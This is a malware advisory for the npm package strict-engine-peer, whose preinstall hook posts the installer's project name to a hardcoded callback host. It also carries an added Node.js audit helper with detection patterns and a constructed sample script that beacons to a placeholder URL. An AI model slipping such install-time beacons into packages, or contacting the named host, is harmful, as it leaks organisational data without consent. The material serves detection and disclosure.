MAL-2026-5898
Malicious code in strict-engine-peer (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0913b30a168bfed09d3c5ae59aeaf6a305a395f86516fb1fb8ece60bb95904de)

On `npm install`, the package's preinstall hook (`preinstall: node index.js` in package.json) executes index.js, which reads the installer's project directory via `process.env.INIT_CWD`, takes its basename as `safeProjectName`, and POSTs a JSON payload containing that name and a timestamp to a hardcoded callback URL `https://deepbounty.dd06-dev.fr/cb/d9b7e171-33a4-49c7-aa79-c95794030d3b`. The package self-describes as a 'Security PoC for Bug Bounty' / 'Harmless dependency confusion PoC', and the name `strict-engine-peer` is consistent with squatting an internal/private package name on the public npm registry. Any developer or build system that resolves this package — typically by accident, via dependency confusion against an internal package of the same name — silently discloses the existence and name of an internal project to the third-party endpoint. The 'research' framing does not change the installer-side impact: unconsented network beacon at install time, leaking organizational metadata to an attacker-controlled host.
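An added detection example, not code from the advisory or from the package: a small Node.js audit helper that flags a package whose install-time lifecycle hook runs a script reading `INIT_CWD` and posting to a hard-coded URL, the pattern described above. The sample package.json and index.js contents are constructed and the callback URL is a placeholder; the hook list and indicator names are assumptions for this demo.

```javascript
// Audit helper (added example): inspects a package's install-time lifecycle
// hooks and the script each hook runs, and reports beacon-style indicators.
// Hooks that run automatically when a package is installed as a dependency.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicators drawn from the advisory's description (names are assumptions).
const INDICATORS = [
  { name: 'reads-init-cwd', re: /process\.env\.INIT_CWD/ },
  { name: 'hardcoded-url', re: /https?:\/\/[^\s'"`]+/ },
  { name: 'outbound-http', re: /\b(fetch|https?\.request|https?\.get|XMLHttpRequest)\b/ },
];

// pkg: parsed package.json; files: map of relative path -> file source text.
// Returns one finding per lifecycle hook present, with matched indicators.
function auditPackage(pkg, files) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // Extract a `node <file>` target so the script that actually runs is inspected.
    const m = /\bnode\s+([^\s&|;]+)/.exec(cmd);
    const target = m ? m[1] : null;
    const src = target && files[target] !== undefined ? files[target] : '';
    const indicators = INDICATORS.filter(i => i.re.test(src)).map(i => i.name);
    const risk = indicators.length >= 2 ? 'high' : indicators.length === 1 ? 'medium' : 'low';
    findings.push({ hook, command: cmd, target, indicators, risk });
  }
  return findings;
}

// Constructed sample mirroring the advisory's description; URL is a placeholder.
const SAMPLE_PKG = {
  name: 'example-internal-pkg', version: '1.0.0',
  scripts: { preinstall: 'node index.js' },
};
const SAMPLE_FILES = {
  'index.js': [
    "const path = require('path');",
    "const safeProjectName = path.basename(process.env.INIT_CWD || '');",
    "fetch('https://callback.example.invalid/cb/PLACEHOLDER', { method: 'POST',",
    "  body: JSON.stringify({ project: safeProjectName, ts: Date.now() }) });",
  ].join('\n'),
};

// Running the file prints the report for the constructed sample.
console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

In a real audit the same function can be fed every `node_modules/*/package.json` and its referenced script files; setting `ignore-scripts=true` in `.npmrc` stops such hooks from running at all.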
Affected packages
No fixed version published yet for strict-engine-peer (npm). Pin to a known-safe version or switch to an alternative.